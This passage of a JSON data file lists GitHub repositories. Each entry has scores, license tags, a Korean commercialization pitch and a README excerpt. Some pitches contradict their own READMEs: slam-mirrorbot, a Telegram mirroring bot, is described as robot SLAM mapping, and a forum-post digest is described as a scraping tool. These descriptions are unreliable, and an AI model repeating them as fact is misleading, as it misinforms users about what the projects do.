[","composite_score":0.676,"license_safety_tag":"restricted"},{"name":"test/smoke","github_url":"https://github.com/test/smoke-4bc411a0","stars":1500,"language":"Python","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"","composite_score":0.6709,"license_safety_tag":"safe"},{"name":"chiphuyen/stanford-tensorflow-tutorials","github_url":"https://github.com/chiphuyen/stanford-tensorflow-tutorials","stars":6,"language":"Python","license":"MIT","abandonment_months":66,"description":"# Stanford TensorFlow 튜토리얼 저장소 분석\n\n## 왜 보물인가\n스탠포드 대학교에서 만든 인공지능 학습 자료로, 복잡한 기술을 누구나 이해할 수 있게 설명하고 있어 교육 콘텐츠로서 매우 가치 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 인공지능 입문 강좌를 유료로 제공하거나 학습자 모집에 활용\n- **기업 직원 교육","readme_excerpt":"[![License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\n[![Join the https://gitter.im/stanford-tensorflow-tutorials](https://badges.gitter.im/tflearn/tflearn.svg)](https://gitter.im/stanford-tensorflow-tutorials)\n\n# stanford-tensorflow-tutorials\nThis repository contains code examples for the course CS 20: TensorFlow for Deep Learning Research. <br>\nIt will be updated as the class progresses. <br>\nDetailed syllabus and lecture notes can be found [here](http://cs20.stanford.edu).<br>\nFor this course, I use python3.6 and TensorFlow 1.4.1.\n\nFor the code and notes of the previous year's course, please see the folder 2017 and the website https://web.stanford.edu/class/cs20si/2017\n\nFor setup instruction and the list of dependencies, please see the setup folder of this repository.","composite_score":0.6704,"license_safety_tag":"safe"},{"name":"diveintodeeplearning/d2l-zh","github_url":"https://github.com/diveintodeeplearning/d2l-zh","stars":91,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# diveintodeeplearning/d2l-zh 분석\n\n## 왜 보물인가\n인공지능과 머신러닝을 배우고 싶은 사람들을 위해 무료로 제공되는 완전한 교과서이자 실습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 교육 플랫폼 SaaS**: 대학교나 온라인 학원이 이 자료를 기반으로 구독형 학습 서비스를 만들어 월 수업료 받기\n2. **기업 내부 교","readme_excerpt":"# 动手学深度学习（Dive into Deep Learning，D2L.ai）\n\n[第二版：zh.D2L.ai](https://zh.d2l.ai)  | [第一版：zh-v1.D2L.ai](https://zh-v1.d2l.ai/) |  安装和使用书中源代码： [第二版](https://zh.d2l.ai/chapter_installation/index.html) [第一版](https://zh-v1.d2l.ai/chapter_prerequisite/install.html)\n\n<h5 align=\"center\"><i>理解深度学习的最佳方法是学以致用。</i></h5>\n\n<p align=\"center\">\n  <img width=\"200\"  src=\"static/frontpage/_images/eq.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/figure.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/code.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/notebook.gif\">\n</p>\n\n本开源项目代表了我们的一种尝试：我们将教给读者概念、背景知识和代码；我们将在同一个地方阐述剖析问题所需的批判性思维、解决问题所需的数学知识，以及实现解决方案所需的工程技能。\n\n我们的目标是创建一个为实现以下目标的统一资源：\n1. 所有人均可在网上免费获取；\n1. 提供足够的技术深度，从而帮助读者实际成为深度学习应用科学家：既理解数学原理，又能够实现并不断改进方法；\n1. 包含可运行的代码，为读者展示如何在实际中解决问题。这样不仅直接将数学公式对应成实际代码，而且可以修改代码、观察结果并及时获取经验；\n1. 允许我们和整个社区不断快速迭代内容，从而紧跟仍在高速发展的深度学习领域；\n1. 由包含有关技术细节问答的论坛作为补充，使大家可以相互答疑并交换经验。\n\n<h5 align=\"center\">将本书（中英文版）用作教材或参考书的大学</h5>\n<p align=\"center\">\n  <img width=\"400\"  src","composite_score":0.67,"license_safety_tag":"safe"},{"name":"huangz1990/redis-3.0-annotated","github_url":"https://github.com/huangz1990/redis-3.0-annotated","stars":5,"language":"C","license":"bsd-3-clause","abandonment_months":33,"description":"# Redis 3.0 주석 버전 분석\n\n## 왜 보물인가\nRedis라는 업계 표준 데이터베이스의 핵심 코드를 한국어 설명으로 배울 수 있는 교육 자료로, 기술 인재 양성의 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n- **개발자 교육 플랫폼**: 온라인 강의나 부트캠프에서 \"Redis 동작 원리\" 커스텀 강좌 제공\n- **대학 프로그래밍 교과서**: 컴퓨","readme_excerpt":"Redis 3.0 源码注释\n============================\n\n本项目是注释版的 Redis 3.0 源码，\n原始代码来自： https://github.com/antirez/redis 。\n\n这份注释是我在创作新版《Redis 设计与实现》期间，\n为了了解 Redis 的内部实现而制作的，\n所有在书中有介绍的内容，\n在源码中都进行了相应的注释。\n\n在注释的过程中，\n除了少量空格和空行方面的调整外，\n没有对原始代码进行任何其他改动，\n最大程度地保证了代码的“原汁原味”。\n\n希望这份注释源码能给大家学习和了解 Redis 带来一点帮助。\n\n另外，\n`新版《Redis 设计与实现》 <http://RedisBook.com>`_\\ 正在各大网店发售中，\n希望大家可以多多支持这本书。\n\nHave fun!\n\n| 黄健宏（huangz）\n| 2014 年 6 月 28 日\n\n\n附录：各个源码文件的作用简介\n------------------------------\n\n+-------------------------------------------------------------------+-------------------------------------------------------------------+\n| 文件                                                              | 作用                                                              |\n+===================================================================+===================================================================+\n| ``adlist.c`` 、 ``adlist.h``                                      | 双端链表数据结构的实现。                                          |\n+-----------","composite_score":0.6681,"license_safety_tag":"safe"},{"name":"SlamDevs/slam-mirrorbot","github_url":"https://github.com/SlamDevs/slam-mirrorbot","stars":8,"language":"Python","license":"GPL-3.0","abandonment_months":30,"description":"# SlamDevs/slam-mirrorbot 분석\n\n## 왜 보물인가\n인터넷에서 파일을 자동으로 복사·정리해주는 도구로, 대량의 데이터를 효율적으로 관리해야 하는 조직에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 저장소 자동 백업 및 동기화 서비스\n- **내부 업무 도구**: 기업의 여러 서버에 산재된 파일을 한 곳으","readme_excerpt":"```diff \n- [ DEAD REPO AND NO MORE UPDATE ]\n```\n[![SlamDevs](https://telegra.ph/file/143032e96542e7534f073.jpg)](https://t.me/SlamDevs)\n\n# Slam Mirror Bot\n![GitHub Repo stars](https://img.shields.io/github/stars/breakdowns/slam-mirrorbot?color=blue&style=flat)\n![GitHub forks](https://img.shields.io/github/forks/breakdowns/slam-mirrorbot?color=green&style=flat)\n![GitHub contributors](https://img.shields.io/github/contributors/breakdowns/slam-mirrorbot?style=flat)\n![GitHub watchers](https://img.shields.io/github/watchers/breakdowns/slam-mirrorbot)\n![Docker Pulls](https://img.shields.io/docker/pulls/breakdowns/mega-sdk-python?label=Docker%20Pull)\n\n**Slam Mirror Bot** is a _multipurpose_ Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive. Based on [python-aria-mirror-bot](https://github.com/lzzy12/python-aria-mirror-bot)\n\n# Features:\n<details>\n    <summary><b>Click Here For More Details</b></summary>\n\n## By Slam Devs\n- qBittorrent\n- Leech support","composite_score":0.6672,"license_safety_tag":"restricted"},{"name":"breakdowns/slam-mirrorbot","github_url":"https://github.com/breakdowns/slam-mirrorbot","stars":7,"language":"Python","license":"GPL-3.0","abandonment_months":30,"description":"# SLAM Mirror Bot 상용화 분석\n\n## 왜 보물인가\n카메라로 주변을 인식하고 자동으로 지도를 만드는 기술로, 로봇·드론·자율주행 같은 미래 기술의 핵심 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **로봇청소기 제조사**: 자동으로 집 구조를 학습하여 더 효율적으로 청소하는 고급형 제품 개발\n2. **배달드론 스타트업**: 드론이 도시 지도","readme_excerpt":"```diff \n- [ DEAD REPO AND NO MORE UPDATE ]\n```\n[![SlamDevs](https://telegra.ph/file/143032e96542e7534f073.jpg)](https://t.me/SlamDevs)\n\n# Slam Mirror Bot\n![GitHub Repo stars](https://img.shields.io/github/stars/breakdowns/slam-mirrorbot?color=blue&style=flat)\n![GitHub forks](https://img.shields.io/github/forks/breakdowns/slam-mirrorbot?color=green&style=flat)\n![GitHub contributors](https://img.shields.io/github/contributors/breakdowns/slam-mirrorbot?style=flat)\n![GitHub watchers](https://img.shields.io/github/watchers/breakdowns/slam-mirrorbot)\n![Docker Pulls](https://img.shields.io/docker/pulls/breakdowns/mega-sdk-python?label=Docker%20Pull)\n\n**Slam Mirror Bot** is a _multipurpose_ Telegram Bot written in Python for mirroring files on the Internet to our beloved Google Drive. Based on [python-aria-mirror-bot](https://github.com/lzzy12/python-aria-mirror-bot)\n\n# Features:\n<details>\n    <summary><b>Click Here For More Details</b></summary>\n\n## By Slam Devs\n- qBittorrent\n- Leech support","composite_score":0.6672,"license_safety_tag":"restricted"},{"name":"ibm-developer-skills-network/Centralized-repository-shipping_calculations","github_url":"https://github.com/ibm-developer-skills-network/Centralized-repository-shipping_calculations","stars":42,"language":"Python","license":"Apache-2.0","abandonment_months":21,"description":"","readme_excerpt":"","composite_score":0.6622,"license_safety_tag":"safe"},{"name":"ibm-developer-skills-network/jbbmo-Introduction-to-Git-and-GitHub","github_url":"https://github.com/ibm-developer-skills-network/jbbmo-Introduction-to-Git-and-GitHub","stars":85,"language":"Python","license":"Apache-2.0","abandonment_months":21,"description":"","readme_excerpt":"","composite_score":0.6622,"license_safety_tag":"safe"},{"name":"googlesamples/android-sunflower","github_url":"https://github.com/googlesamples/android-sunflower","stars":13,"language":"Kotlin","license":"Apache-2.0","abandonment_months":22,"description":"# Android Sunflower 저장소 분석\n\n## 왜 보물인가\nGoogle이 공식 제공하는 안드로이드 앱 개발 교재로, 최신 기술을 배우고 실제 앱 개발에 바로 적용할 수 있는 완성된 예제 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 식물 관리 앱으로 구독형 프리미엄 기능 제공 (분석, 알림, 식물 도감)\n- **내부 업무 ","readme_excerpt":"# Android Sunflower with Compose\n\nWarning: The Sunflower repository is no longer under maintenance, We are prioritizing https://github.com/android/compose-samples as the up-to-date source of truth for Compose best practises. Please use that repository and sample set to continue learning about Jetpack Compose. If you'd like to continue using Sunflower, we encourage you to maintain your own fork of the sample. \n\nA gardening app illustrating Android development best practices with migrating a View-based app to\nJetpack Compose. To learn about how Sunflower was migrated to Compose, see the \n[migration journey](https://github.com/android/sunflower/blob/main/docs/MigrationJourney.md) document.\n\n> [!Note]\n> To see the original View implementation of Sunflower, checkout the [`views`](https://github.com/android/sunflower/tree/views) branch.\n\n## Screenshots\n\n<img src=\"screenshots/SunflowerM3Screenshots.png\"/>\n\n## Features\n\nThis sample showcases how to migrate an existing View-based app (Material ","composite_score":0.6598,"license_safety_tag":"safe"},{"name":"shenzhengfang/kkndme_tianya","github_url":"https://github.com/shenzhengfang/kkndme_tianya","stars":118,"language":"","license":"unknown","abandonment_months":33,"description":"# shenzhengfang/kkndme_tianya 분석\n\n## 왜 보물인가\n118개의 별을 받은 이 프로젝트는 중국의 주요 커뮤니티 플랫폼 데이터를 수집·분석하는 도구로, 소셜 미디어 인사이트가 필요한 기업들에게 매력적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **시장조사 SaaS**: 기업이 구독하여 중국 온라인 트렌드와 소비자 반응을 실시간으로 ","readme_excerpt":"# kkndme_tianya（持续更新中...）\n\n> 天涯神贴[「2010年的房地产调控，我们收获了什么？写在房价暴涨前」](http://bbs.tianya.cn/post-house-252774-1.shtml)脱水版，内容时间顺序和原贴一致，原贴中的优质非楼主写的内容，添加了引用格式便于区分。\n> \n> 除标题外，所有内容均来自原贴，标题是我简单加的，目的是为了做目录，便于查看。\n\n- [调控降房价是刚需的一厢情愿](#调控降房价是刚需的一厢情愿)\n\t- [1、人人都有居住权。房子是用来住的，不是用来炒的。](#1人人都有居住权房子是用来住的不是用来炒的)\n\t- [2、房子太贵了，租售比严重不合理，空置率太高，人均收入太低，早晚要崩盘。](#2房子太贵了租售比严重不合理空置率太高人均收入太低早晚要崩盘)\n\t- [3、房价上涨造成物价上涨，人民生活变得困难](#3房价上涨造成物价上涨人民生活变得困难)\n- [调控的真正目的：防范金融风险 & 通过垄断实现gj利益最大化](#调控的真正目的防范金融风险--通过垄断实现gj利益最大化)\n- [官方公布的统计数据，只要关系到某个群体的利益，就一定会被修饰导致失真](#官方公布的统计数据只要关系到某个群体的利益就一定会被修饰导致失真)\n- [税收从来都是向下游转嫁的 & 房产税迟迟不出台的真正原因](#税收从来都是向下游转嫁的--房产税迟迟不出台的真正原因)\n- [房地产的现状](#房地产的现状)\n- [房价持续上涨的本质是稀缺性让好房子成为资金最好的去处](#房价持续上涨的本质是稀缺性让好房子成为资金最好的去处)\n- [关于垄断](#关于垄断)\n\t- [1、垄断的好处是没有风险](#1垄断的好处是没有风险)\n\t- [2、垄断可以解决社会稳定](#2垄断可以解决社会稳定)\n\t- [3、房屋垄断只会愈演愈烈，底层人民想要拥有一套房子的难度只会越来越难](#3房屋垄断只会愈演愈烈底层人民想要拥有一套房子的难度只会越来越难)\n- [民生问题](#民生问题)\n- [房产税的制定原则](#房产税的制定原则)\n- [维稳的本质是人民能吃饱饭](#维稳的本质是人民能吃饱饭)\n- [公租房是为体制内服务的](#公租房是为体制内服务的)\n-  [房产税一定会转嫁给租房人](#房产税一定会转嫁给租房人)\n- [巨大的税收消耗也决定了","composite_score":0.657,"license_safety_tag":"unknown"},{"name":"solana-labs/token-list","github_url":"https://github.com/solana-labs/token-list","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":22,"description":"# Solana Token List 분석\n\n## 왜 보물인가\n솔라나 블록체인에서 사용되는 모든 암호화폐들의 공식 정보를 한곳에 관리하는 핵심 인프라로, 암호화폐 거래소나 지갑 서비스가 반드시 필요로 하는 신뢰할 수 있는 데이터 기반입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래소 및 지갑 서비스**\n사용자가 거래하거나 보관할 수 있는 암호화폐 ","readme_excerpt":"---\n# 🚨🚨🚨This repository is EOL 🚨🚨🚨\n## Read below for instructions on new token metadata flow\n---\n\nAs of June 20th, this repository will be archived and will receive no more updates. The repository will be set to read-only and the npm package will still exist at `@solana/spl-token-registry`.\n\n## Adding a New Token\n\nYou can use one of two tools at the time of writing:\n\n1. [Strata Protocol Token Launchpad](https://app.strataprotocol.com/launchpad/manual/new)\n2. [Token Creator Demo](https://token-creator-lac.vercel.app/)\n\nAll new token metadata will be added using Metaplex Fungible Token Metadata. The steps to add new Fungible Token Metadata are as follows:\n\n1. Use `CreateMetadataV2` instruction from Metaplex token metadata to create new metadata for token.\n2. Make sure you use the correct format for the token metadata.\n3. You must have mint authority in order to create or update the metadata\n\nThe token metadata for Metaplex Metadata Schema is in the following format:\n\n```json\n{\n  \"name\":","composite_score":0.6527,"license_safety_tag":"safe"},{"name":"miloyip/json-tutorial","github_url":"https://github.com/miloyip/json-tutorial","stars":7,"language":"C","license":"unknown","abandonment_months":24,"description":"# json-tutorial 저장소 분석\n\n## 왜 보물인가\nJSON(데이터 형식)을 처음부터 배울 수 있는 튜토리얼로, 웹 서비스와 앱 개발에 필수적인 기초 지식을 쉽게 습득할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 초보자용 온라인 학습 플랫폼에 통합하여 구독료 수익 창출\n- **내부 업무 도구**: 기업 신입사원 교","readme_excerpt":"# 从零开始的 JSON 库教程\n\n* Milo Yip\n* 2016/9/15\n\n也许有很多同学上过 C/C++ 的课后，可以完成一些简单的编程练习，又能在一些网站刷题，但对于如何开发有实际用途的程序可能感到束手无策。本教程希望能以一个简单的项目开发形式，让同学能逐步理解如何从无到有去开发软件。\n\n为什么选择 JSON？因为它足够简单，除基本编程外不需大量技术背景知识。JSON 有标准，可按照标准逐步实现。JSON 也是实际在许多应用上会使用的格式，所以才会有大量的开源库。\n\n这是一个免费、开源的教程，如果你喜欢，也可以打赏鼓励。因为工作及家庭因素，不能保证每篇文章的首发时间，请各位见谅。\n\n## 对象与目标\n\n教程对象：学习过基本 C/C++ 编程的同学。\n\n通过这个教程，同学可以了解如何从零开始写一个 JSON 库，其特性如下：\n\n* 符合标准的 JSON 解析器和生成器\n* 手写的递归下降解析器（recursive descent parser）\n* 使用标准 C 语言（C89）\n* 跨平台／编译器（如 Windows／Linux／OS X，vc／gcc／clang）\n* 仅支持 UTF-8 JSON 文本\n* 仅支持以 `double` 存储 JSON number 类型\n* 解析器和生成器的代码合共少于 500 行\n\n除了围绕 JSON 作为例子，希望能在教程中讲述一些课题：\n\n* 测试驱动开发（test driven development, TDD）\n* C 语言编程风格\n* 数据结构\n* API 设计\n* 断言\n* Unicode\n* 浮点数\n* Github、CMake、valgrind、Doxygen 等工具\n\n## 教程大纲\n\n本教程预计分为 9 个单元，第 1-8 个单元附带练习和解答。\n\n1. [启程](tutorial01/tutorial01.md)（2016/9/15 完成）：编译环境、JSON 简介、测试驱动、解析器主要函数及各数据结构。练习 JSON 布尔类型的解析。[启程解答篇](tutorial01_answer/tutorial01_answer.md)（2016/9/17 完成）。\n2. [解析数字](tutorial02/tutorial02.md)（2016/9/18 完成）：JSON number 的语法。练习 J","composite_score":0.6525,"license_safety_tag":"unknown"},{"name":"alibaba/Alink","github_url":"https://github.com/alibaba/Alink","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":24,"description":"# Alibaba Alink 기술 가치 평가\n\n## 왜 보물인가\n알리바바가 만든 대규모 데이터 분석 도구로, 복잡한 계산을 정확하게 처리하는 능력이 뛰어나 금융·의료·통계 분야에서 신뢰받을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융사 데이터 분석 SaaS**\n은행, 증권사가 투자자 자산을 정확하게 계산하고 리스크를 분석하는 클라우드 서비스로 ","readme_excerpt":"<font size=7>[English](README.en-US.md)| 简体中文</font>\n\n# Alink\n\n Alink是基于Flink的通用算法平台,由阿里巴巴计算平台PAI团队研发,欢迎大家加入Alink开源用户钉钉群进行交流。\n \n \n<div align=center>\n<img src=\"https://img.alicdn.com/tfs/TB1kQU0sQY2gK0jSZFgXXc5OFXa-614-554.png\" height=\"25%\" width=\"25%\">\n</div>\n\n- Alink组件列表：http://alinklab.cn/manual/index.html\n- Alink教程：http://alinklab.cn/tutorial/index.html\n- Alink插件下载器：https://www.yuque.com/pinshu/alink_guide/plugin_downloader\n\n#### Alink教程\n<div align=center>\n<img src=\"https://img.alicdn.com/imgextra/i2/O1CN01Z7sbCr1Hg22gLIsdk_!!6000000000786-0-tps-1280-781.jpg\" height=\"50%\" width=\"50%\">\n</div>\n\n- Alink教程（Java版）：http://alinklab.cn/tutorial/book_java.html\n- Alink教程（Python版）：http://alinklab.cn/tutorial/book_python.html\n- 源代码地址：https://github.com/alibaba/Alink/tree/master/tutorial\n- Java版的数据和资料链接：http://alinklab.cn/tutorial/book_java_00_reference.html\n- Python版的数据和资料链接：http://alinklab.cn/tutorial/book_python_00_reference.html\n- Alink教程(Java版)代码的运行攻略  http://alinklab.cn/tutorial/book_java_","composite_score":0.6494,"license_safety_tag":"safe"},{"name":"ljpzzz/machinelearning","github_url":"https://github.com/ljpzzz/machinelearning","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":28,"description":"# ljpzzz/machinelearning 분석 보고서\n\n## 왜 보물인가\n데이터를 패턴으로 분석해 미래를 예측하는 인공지능 기술을 누구나 사용할 수 있도록 만든 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 이탈 예측 또는 수요 예측 서비스로 월간 구독 모델 운영\n- **내부 업무 도구**: 대기업의 데이터 분석팀이 마케","readme_excerpt":"# 刘建平Pinard的博客配套代码\n\nhttp://www.cnblogs.com/pinard 刘建平Pinard\n\n之前不少朋友反应我博客中的代码都是连续的片段，不好学习，因此这里把文章和代码做一个整理。\n代码有部分来源于网络，已加上相关方版权信息。部分为自己原创，已加上我的版权信息。\n\n## 目录\n\n* [机器学习基础与回归算法](#2)\n\n* [机器学习分类算法](#3)\n\n* [机器学习聚类算法](#4)\n\n* [机器学习降维算法](#5)\n\n* [机器学习集成学习算法](#6)\n\n* [数学统计学](#7)\n\n* [机器学习关联算法](#8)\n\n* [机器学习推荐算法](#9)\n\n* [深度学习算法](#10)\n\n* [自然语言处理算法](#11)\n\n* [强化学习算法](#1)\n\n* [特征工程与算法落地](#12)\n\n## 注意\n\n2016-2017年写的博客使用的python版本是2.7， 2018年因为TensorFlow对Python3的一些要求，所以写博客使用的Python版本是3.6。少部分2016，2017年的博客代码无法找到，重新用Python3.6跑过上传，因此可能会出现和博客中代码稍有不一致的地方，主要涉及到print的语法和range的用法，若遇到问题，稍微修改即可跑通。\n\n## [赞助我](#13)\n\n<h3 id=\"1\">强化学习文章与代码：:</h3>\n\n|文章 | 代码|\n---|---\n[强化学习（一）模型基础](https://www.cnblogs.com/pinard/p/9385570.html)| [代码](https://github.com/ljpzzz/machinelearning/blob/master/reinforcement-learning/introduction.py)\n[强化学习（二）马尔科夫决策过程(MDP)](https://www.cnblogs.com/pinard/p/9426283.html) | 无\n[强化学习（三）用动态规划（DP）求解](https://www.cnblogs.com/pinard/p/9463815.html) | 无\n[强化学习（四）用蒙特卡罗法（MC）求解](https://www.cnblogs.com/pinard/p/9492980.htm","composite_score":0.6487,"license_safety_tag":"safe"},{"name":"metaplex-foundation/metaplex","github_url":"https://github.com/metaplex-foundation/metaplex","stars":10,"language":"","license":"Apache-2.0","abandonment_months":22,"description":"# Metaplex 저장소 분석\n\n## 왜 보물인가\n블록체인 기반 디지털 자산(NFT, 토큰 등)을 쉽게 만들고 판매할 수 있는 기반 시설로, 암호화폐 시장의 인프라 수요가 계속 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: NFT 창작자를 위한 온라인 플랫폼 (드래그앤드롭으로 NFT 생성 및 판매)\n- **내부 업무 도구**:","readme_excerpt":"# Metaplex Foundation Project Directory\nThis repository is a directory of the projects that the Metaplex Foundation works on. \n\nTo learn more, visit our documentation at https://docs.metaplex.com.\n\n## Rust Programs\n- **The Metaplex Program Library** - [GitHub](https://github.com/metaplex-foundation/metaplex-program-library)\n\n  A collection of all the Solana programs that the Metaplex Foundation actively maintains. Each program is published to https://crates.io.\n\n\n## SDKs\nThese high level SDKs make it a breeze to interact with our programs.\n- **JavaScript SDK** - [GitHub](https://github.com/metaplex-foundation/js) / [NPM](https://www.npmjs.com/package/@metaplex-foundation/js)\n  \n  Our JS SDK is a high level SDK for interacting with our programs and was built on top of our autogenerated libraries. It currently still in active development.\n\n\n- **iOS SDK** - [GitHub](https://github.com/metaplex-foundation/metaplex-ios)\n\n  Our new iOS SDK is built from scratch in Swift to provide a smooth e","composite_score":0.6439,"license_safety_tag":"safe"},{"name":"sivel/speedtest-cli","github_url":"https://github.com/sivel/speedtest-cli","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":22,"description":"# speedtest-cli 상용화 분석\n\n## 왜 보물인가\n인터넷 속도를 정확하게 측정하는 핵심 기술로, 통신사·데이터센터·기업들이 네트워크 품질을 검증하는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **ISP 모니터링 SaaS**: 인터넷 서비스 제공업체가 고객별 속도 저하를 실시간으로 감지하고 보상하는 자동화 플랫폼\n2. **기업 네트","readme_excerpt":"speedtest-cli\n=============\n\nCommand line interface for testing internet bandwidth using\nspeedtest.net\n\n.. image:: https://img.shields.io/pypi/v/speedtest-cli.svg\n        :target: https://pypi.python.org/pypi/speedtest-cli/\n        :alt: Latest Version\n.. image:: https://img.shields.io/travis/sivel/speedtest-cli.svg\n        :target: https://pypi.python.org/pypi/speedtest-cli/\n        :alt: Travis\n.. image:: https://img.shields.io/pypi/l/speedtest-cli.svg\n        :target: https://pypi.python.org/pypi/speedtest-cli/\n        :alt: License\n\nVersions\n--------\n\nspeedtest-cli works with Python 2.4-3.7\n\n.. image:: https://img.shields.io/pypi/pyversions/speedtest-cli.svg\n        :target: https://pypi.python.org/pypi/speedtest-cli/\n        :alt: Versions\n\nInstallation\n------------\n\npip / easy\\_install\n~~~~~~~~~~~~~~~~~~~\n\n::\n\n    pip install speedtest-cli\n\nor\n\n::\n\n    easy_install speedtest-cli\n\nGithub\n~~~~~~\n\n::\n\n    pip install git+https://github.com/sivel/speedtest-cli.git\n\nor\n\n::\n\n    git cl","composite_score":0.6438,"license_safety_tag":"safe"},{"name":"ZhongFuCheng3y/3y","github_url":"https://github.com/ZhongFuCheng3y/3y","stars":13,"language":"","license":"Apache-2.0","abandonment_months":24,"description":"# ZhongFuCheng3y/3y 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2024년 5월로 비교적 최근이지만, 정확한 프로젝트 설명이 없어 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 데이터 분석이나 리포팅 자동화 시스템으로 활용\n- **API 판매**: 다른 회사의 소프트웨어에 통합되는 기능","readme_excerpt":"![](doc/images/1.jpg)\n\n<p align=\"center\">\n  <a href=\"#\"><img src=\"https://img.shields.io/badge/Author-3y-orange.svg\" alt=\"作者\"></a>\n  <a href=\"https://gitee.com/zhongfucheng/athena\"><img src=\"https://gitee.com/zhongfucheng/athena/badge/star.svg?theme=dark\" alt=\"gitee Starts\"></a>\n  <a href=\"https://gitee.com/zhongfucheng/athena\"><img src=\"https://gitee.com/zhongfucheng/athena/badge/fork.svg?theme=dark\" alt=\"gitee Starts\"></a>\n  <a href=\"https://github.com/ZhongFuCheng3y/athena\"><img src=\"https://img.shields.io/github/forks/ZhongFuCheng3y/3y.svg?style=flat&label=GithubFork\"></a> \n  <a href=\"https://github.com/ZhongFuCheng3y/athena\"><img src=\"https://img.shields.io/github/stars/ZhongFuCheng3y/3y.svg?style=flat&label=GithubStars\"></a> \n\n</p>\n\n### 开源项目austin\n\n想学Java项目的，我强烈推荐我的开源项目[消息推送平台Austin（11K+ stars）](https://gitee.com/zhongfucheng/austin)，可以用作**毕业设计**/**校招**，可以看看**线上生产环境**是怎么推送消息的。已经有不少同学**通过这个项目拿到字节/菜鸟/vivo等大厂**的offer了！\n\n:fire:项目仓库地址：[https://gitee.com/zhongfucheng/austin](https://gi","composite_score":0.6437,"license_safety_tag":"safe"},{"name":"chainlist/svelte-forms","github_url":"https://github.com/chainlist/svelte-forms","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":32,"description":"# chainlist/svelte-forms 분석\n\n## 왜 보물인가\n웹사이트의 입력 양식(회원가입, 설문조사 등)을 쉽게 만들고 관리할 수 있는 도구로, 비개발자도 드래그앤드롭으로 양식을 구성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 피드백 수집 플랫폼으로 월 구독료를 받으며 판매\n- **내부 업무 도구**: 기업의 H","readme_excerpt":"\n# svelte-forms [![Tests](https://github.com/chainlist/svelte-forms/actions/workflows/tests.js.yml/badge.svg)](https://github.com/chainlist/svelte-forms/actions/workflows/tests.js.yml) [![Downloads](https://img.shields.io/npm/dt/svelte-forms)](https://www.npmjs.com/package/svelte-forms)\n\n## V2 is here! 🎊\n\nCheck out the new documentation website [here](https://chainlist.github.io/svelte-forms/)\n\n## todo list\n\n- Fix the issues when they appear! :)\n","composite_score":0.6428,"license_safety_tag":"safe"},{"name":"azkaban/azkaban","github_url":"https://github.com/azkaban/azkaban","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":23,"description":"# Azkaban 저장소 분석\n\n## 왜 보물인가\n복잡한 작업들을 자동으로 순서대로 실행하고 관리해주는 '일정 관리 도우미'로, 기업의 반복적인 데이터 처리 작업을 사람 손으로 하지 않아도 되게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n**데이터 분석 서비스**: 매일 자동으로 고객 데이터를 수집·정리·분석하고 보고서를 만드는 SaaS 서비스로 제공\n","readme_excerpt":"# Azkaban \n\n[![Build Status](https://travis-ci.com/azkaban/azkaban.svg?branch=master)](https://travis-ci.com/azkaban/azkaban)[![codecov.io](https://codecov.io/github/azkaban/azkaban/branch/master/graph/badge.svg)](https://codecov.io/github/azkaban/azkaban)[![Join the chat at https://gitter.im/azkaban-workflow-engine/Lobby](https://badges.gitter.im/azkaban-workflow-engine/Lobby.svg)](https://gitter.im/azkaban-workflow-engine/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)[![Documentation Status](https://readthedocs.org/projects/azkaban/badge/?version=latest)](https://azkaban.readthedocs.org/en/latest/?badge=latest)\n\n\n## Build\nAzkaban builds use Gradle and requires Java 8 or higher.\n\nThe following set of commands run on *nix platforms like Linux, OS X.\n\n```\n# Build Azkaban\n./gradlew build\n\n# Clean the build\n./gradlew clean\n\n# Build and install distributions\n./gradlew installDist\n\n# Run tests\n./gradlew test\n\n# Build without running tests\n./gradlew build -x","composite_score":0.642,"license_safety_tag":"safe"},{"name":"EtherDream/jsproxy","github_url":"https://github.com/EtherDream/jsproxy","stars":5,"language":"Shell","license":"MIT","abandonment_months":26,"description":"# EtherDream/jsproxy 분석\n\n## 왜 보물인가\n인터넷 접근이 차단된 환경에서도 웹사이트를 자유롭게 이용할 수 있게 해주는 기술로, 접근성 제한이 많은 기업이나 지역에서 큰 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 솔루션**: 직원들의 인터넷 접근을 통제하면서도 필요한 웹서비스는 사용 가능하게 해주는 SaaS\n- **학교","readme_excerpt":"\n# 更新\n\n* 2019-07-24 [v0.1.0](https://github.com/EtherDream/jsproxy/blob/master/changelogs/v0.1.0.md) 发布，主要修复了缓存失效的问题。网络接口和之前版本不兼容，请及时更新服务端和 cfworker。\n\n* 2019-06-22 [cfworker 无服务器版](cf-worker) 发布，长期使用演示服务的请使用该版本。\n\n[查看更多](changelogs)\n\n\n# 